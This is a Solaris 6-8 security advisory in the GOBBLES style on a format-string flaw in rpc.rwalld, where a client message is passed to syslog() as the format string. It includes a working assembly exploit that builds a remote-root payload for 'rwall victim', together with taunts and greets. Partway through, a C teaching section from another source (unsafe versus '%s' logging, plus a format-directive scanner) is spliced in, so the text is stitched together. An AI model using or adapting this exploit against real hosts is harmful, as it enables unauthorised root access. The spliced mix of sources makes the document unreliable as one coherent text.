-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

GOBBLES SECURITY ADVISORY #32

ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!

Forward:

<@route> so was fydor trying to make his code unreadable when he write nmap?
<@route> or was that just the fallout of poor planning?
<@route> this is awful
<@route> if ( !victim || !sport || !dport || sd < 0) {
<@route> fprintf(stderr, "send_udp_raw: One or more of your parameters suck!\n");
<@route> free(packet);
<@route> return -1;
<@route> }
<@route> This is the program that is used everywhere and written up in countless books?
<@route> it's pretty much obscene that this program doesnt use libnet

Systems Affected:

Sun Solaris 6, Sun Solaris 7, Sun Solaris 8 (sparc and x86 versions)

Threat Level:

Super duper high.

Vendor Notification Status:

Initial advisory sent to Sun Microsystems on Friday, April 5th. After long series of email exchange, Sun.com engineers finally begin working on developing patch for bug. Days later, CERT contact GOBBLES about bug. Dialogue happen then too with CERT. Both Sun Microsystems and CERT have promised to make sure that GOBBLES name is in both official advisories released. Hey, we do this for fame and attention, now that we are no longer weaned we must do something! Some time, full disclosure is real pain in ass. Everyone want more and more time to get things fixed before advisory is released. Time to grace lists with more GOBBLES Advisory.

Exploit:

A proof-of-concept exploit for this vulnerability has been attached to the bottom of this email. GOBBLES wrote it in way to keep unskilled from using it, like security assessment team from Vigilante who not able to tell if vulnerability is real or not in opensourced product after reading advisory. At the same time, skilled penetrators should not have any trouble using the code provided to exploit systems in the wild. Don't send GOBBLES email asking for other versions of exploit.
Some things better left private and given to close friends for their own motivations. If you can't figure out how to work with this exploit and get remote root from what is provided in the advisory, really there is no reason for you to be using an exploit.

A Few Words:

There are some thing that GOBBLES have to say, some thing very heartfelt that he need to communicate to the world, some thing that best said in song, please take time to read lyric and understand what GOBBLES trying to say. . .

"the sun has blessed the rays are gone and all the kids have left their tears and gone home, sweet 17, sour 29 and i can't explain myself what i'd hoped to find you were all so kind when i was near, and if you're still feeling down then maybe you need me around to love and hold you don't say i hadn't told you so maybe you need me around, i had no luck i had no shame i had no cause just seventeen days of rain and you in my eyes, just one more song to slay this earth and i can't explain myself just what it's worth what was all i had but not all i'd need and i can't escape the fact that i still bleed, and if you're still feeling down and if this seems way too loud then maybe you need me around, i had no voice i had no drive i had no choice i've done my time had myself had my band i had my love had no hand in watching it all fall apart and if you're still feeling down then maybe you need me around to lift and scold you to send you crashing all right now maybe you need me around."

-- Blissed and Gone, the Smashing Pumpkins

Description of Problem (Part One):

One of the default RPC services in Sun Solaris versions 6-8 has an insecure syslog() statement, which allow remote attacker to execute custom code as root.

Hehe, GOBBLES bet you getting pissed because in all this length of advisory, still no mention of what is vulnerable, hehehe, ;PPPPpppppppppppppppp. Keep control of temper, and keep reading, because you about to find out, hehehe GOBBLES is silly today.
Remotely Exploitable:

Yes.

Locally Exploitable:

Yes.

Privilege Attained After Exploitation:

Root.

Exploit Included:

As GOBBLES did mention previously, yes. It get you root. Girls will be impressed with mailing list reading skills and source code leeching technique utilized to gain remote root to Solaris machines. Included exploit for Sparc.

Name of Vulnerable Service:

    $ grep rwall /etc/inetd.conf
    # The rwall server allows others to post messages to users on this machine.
    walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld

It rwalld that vulnerable. It run as root. Attacker get root from exploiting it.

Description of Problem (Part Two):

Inside rwall_subr.c we see:

    /*
     * Make sure the wall programs exists, is executeable, and runs
     */
    if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
        (fp = popen(WALL_PROG, "w")) == NULL) {
            syslog(LOG_NOTICE,
                "rwall message received but could not execute %s", WALL_PROG);
            syslog(LOG_NOTICE, msg);

Bug easy enough to spot, but now question is, "GOBBLES, friend, how is this to be exploited? Faulty syslog() only called if rpc.rwalld can not execute /usr/sbin/wall on local system, which mean it only exploitable if admin have chmod -x or rm /usr/sbin/wall or something like this, right, so why this such a big deal?"

To this GOBBLES say, "Friend IDIOT, faulty syslog() is called if anything is to make popen() fail, there one other way to exploit bug, which make it dangerous and affect all installation of Solaris running rpc.rwalld, is that popen() to fail if there no available file descriptors on system."

This easier to exploit locally on system. For remote exploitation, timing is important and thus is race condition. Each new tcp session to running service on target host will consume file descriptor. Then run attached exploit to have root handed over, like operator status given to route in #phrack with no question ask.

Patch Available:

Fucked if GOBBLES knows.
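To make the defect concrete for anyone auditing their own code for the same pattern, here is an added example; it is not code from the advisory or from Sun's rwall_subr.c. A stand-in for syslog() treats its format argument like the real call does, the rwalld fallback call sits beside its hardened "%s" form, and a small scanner reports whether a message holds a conversion specification that the unsafe path would interpret. The names fake_syslog, log_wall_failure_unsafe, log_wall_failure_safe and has_format_directive, and the sample message, are assumptions of this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for syslog(3): like the real call it treats "fmt" as a printf-style
 * format. It writes into "out" instead of the log so the result can be checked. */
static void fake_syslog(char *out, size_t outlen, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
}

/* Mirrors the rwalld fallback path quoted above: the client-supplied rwall
 * message itself becomes the format string. */
void log_wall_failure_unsafe(char *out, size_t outlen, const char *msg) {
    fake_syslog(out, outlen, msg);
}

/* Hardened form of the same call: the format is a constant and the message is
 * only ever consumed as a "%s" argument, so any '%' bytes in it are inert. */
void log_wall_failure_safe(char *out, size_t outlen, const char *msg) {
    fake_syslog(out, outlen, "%s", msg);
}

/* Returns 1 if msg holds a conversion specification (a '%' not escaped as
 * "%%"), i.e. data the unsafe path would interpret instead of logging. */
int has_format_directive(const char *msg) {
    for (const char *p = msg; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%')
            p++;            /* "%%" is a literal percent sign, skip it */
        else
            return 1;
    }
    return 0;
}

int main(void) {
    /* Constructed rwall message. "%%" is the only directive that is defined
     * without a matching argument, which keeps the demonstration well-defined. */
    const char *msg = "disk 100%% full";
    char unsafe_out[64], safe_out[64];
    log_wall_failure_unsafe(unsafe_out, sizeof unsafe_out, msg);
    log_wall_failure_safe(safe_out, sizeof safe_out, msg);
    printf("unsafe logged: %s\nsafe logged:   %s\n", unsafe_out, safe_out);
    return has_format_directive(msg) ? 1 : 0;
}
```

The unsafe path logs "disk 100% full" while the safe path logs the message byte for byte; on the real syslog() prototype gcc's -Wformat-security reports the unsafe call at compile time.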
Suggested Workaround:

GOBBLES suggest that admin disable rwalld from /etc/inetd.conf until patch made available, then restart it. If you wait until patch available until upgrade you probably have to do upgrade by reinstalling operating system, because now exploit out and probably in hands of less than ethical penetrator looking to abuse you in one way or another.

Security Candy:

-begin copy-

    /*
    Remote Root Exploit for Solaris 6-8 rpc.walld

    Usage Instructions:
    1. Compile. gcc -o xwall xwall.s
    2. Run. (./xwall ; ./shellcode) | rwall victim
    3. Late Easter egg. strings xwall

    Note(s):
    Something else must be done to consume FD's on victim system. Figure this one out for self.
    This exploit written to be run on Linux. Supplied format string is for Sparc Solaris.
    Provide own remote shellcode and use as above described.

    Love,
    GOBBLES Security
    http://www.bugtraq.org
    GOBBLES@hushmail.com
    */

    retloc:
    .long 0x41424344
    retaddr:
    .long 0x60bb135
    padding:
    .long 4
    walkcount:
    .long 1

    .globl main
    .type main,@function
    main:
    pusha
    movl (padding),%ecx
    jusfhds7fg:
    pushl %ecx
    movl $4,%eax
    movl $1,%ebx
    pushl $0x00000041
    movl %esp,%ecx
    movl $1,%edx
    int $0x80
    popl %ecx
    popl %ecx
    loop jusfhds7fg
    movl %esp,24(%esp)
    pushl $0x42424242
    movl $4,%edx
    movl %esp,%ecx
    movl $1,%ebx
    movl $4,%eax
    int $0x80
    movl (retloc),%eax
    bswapl %eax
    pushl %eax
    subl $4,%ecx
    movl %edx,%eax
    int $0x80
    addl $4,%ecx
    movl %edx,%eax
    int $0x80
    subl $4,%ecx
    popl %eax
    bswapl %eax
    incl %eax
    incl %eax
    bswapl %eax
    pushl %eax
    movl %edx,%eax
    int $0x80
    popl %eax
    movl %esp,%edx
    incl %edx
    xorl %esi,101(%ebp)
    andb %al,111(%edx)
    popa
    pushl %edx
    andb %al,97(%ebx)
    decl %esi
    aaa
    andb %al,111(%ebx)
    incl %esp
    xorl (%ecx),%eax
    movl (walkcount),%ecx
    cmpl $0,%ecx
    je nczxhczjcg89zg89
    pushl %ecx
    movl $4,%edx
    movl $1,%ebx
    pushl $0x78382e25
    cmzxnczxcz8c:
    pushl %ecx
    movl %esp,%ecx
    addl $4,%ecx
    movl $4,%eax
    int $0x80
    popl %ecx
    loop cmzxnczxcz8c
    popl %ecx
    popl %ecx
    nczxhczjcg89zg89:
    movl (retaddr),%edx
    pushl %edx
    shr $16,%edx
    subl %edx,(%esp)
    movw $0,2(%esp)
    pushl %edx
    shll $3,%ecx
    subl %ecx,(%esp)
    movl (padding),%edx
    subl %edx,(%esp)
    subl $16,(%esp)
    movw $0,2(%esp)
    pushl $cznxczxczxh8
    call printf
    movl $1,%eax
    int $0x80
    cznxczxczxh8:
    .string "%%%uc%%hn%%%uc%%hn\n"

-begin paste-

Greets:

route, because route deserves attention, use libnet it rulez. route, why you refuse GOBBLES interview on supposed intrusion on @stake subnet that was allowed when some malicious local user ran trojaned blackhat warez? GOBBLES need to confirm with you if this really did happen, please respond soon...

Tracy@mp3.com, the Official Sysadmin Mascot of GOBBLES Security. Thanks for letting GOBBLES know to cut out the "leet gr33tz" from advisory, now people hold lots of respect for GOBBLES. Thanks Tracy, you're a peach. Next advisory will be disclosure of 0day CSS holes in mp3.com's website...

w00w00 Security Development, publishing advisories at the blinding speed of 1 per 3 years, and still being the largest active nonprofit security group in the world, to the eyes of the public. Disclosure is good when it serve a political agenda, hehehehe...

The Securityfocus Staff, who often reject the legitimate research materials of GOBBLES from their lists, but make sure they archive it on their website anyways. Thanks for at least giving us some of the credit that we deserve. In the future, though, if our submissions don't meet your requirements for publication on the lists, don't put them on your website. Enough of this double standards bullshit.

zen-parse, for defining what a whitehat is -- no skill, no ethic, no respect.

and finally, the beautiful Jennifer Garner, who play Sydney Bristow in tv show Alias, who many member of GOBBLES Security is in love with. You win free GOBBLES Security tshirt, come to defcon in August to get it, hehehehehehe!
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

-----END PGP SIGNATURE-----